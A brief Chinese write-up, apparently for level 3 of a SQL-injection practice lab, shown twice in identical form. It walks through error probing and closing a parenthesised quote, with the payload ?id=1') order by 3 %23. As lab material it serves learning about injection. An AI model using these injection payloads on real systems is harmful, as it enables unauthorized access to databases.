来到第三关
继续老规矩
and 1=1,and 1=2
没反应
那我们继续来用单引号来试 ’
报错了
细心的会发现相比第一关
多出了一个 )
我们就可以猜测后台语句可能是
select * from * where id = (’$id’) LIMIT 0,1
我们就可以构造语句了
把(‘1’) 构造成 (‘1’) sql语句 #’)
例如:
?id=1') order by 3 %23
代入进去成功通关
来到第三关
继续老规矩
and 1=1,and 1=2
没反应
那我们继续来用单引号来试 ’
报错了
细心的会发现相比第一关
多出了一个 )
我们就可以猜测后台语句可能是
select * from * where id = (’$id’) LIMIT 0,1
我们就可以构造语句了
把(‘1’) 构造成 (‘1’) sql语句 #’)
例如:
?id=1') order by 3 %23
代入进去成功通关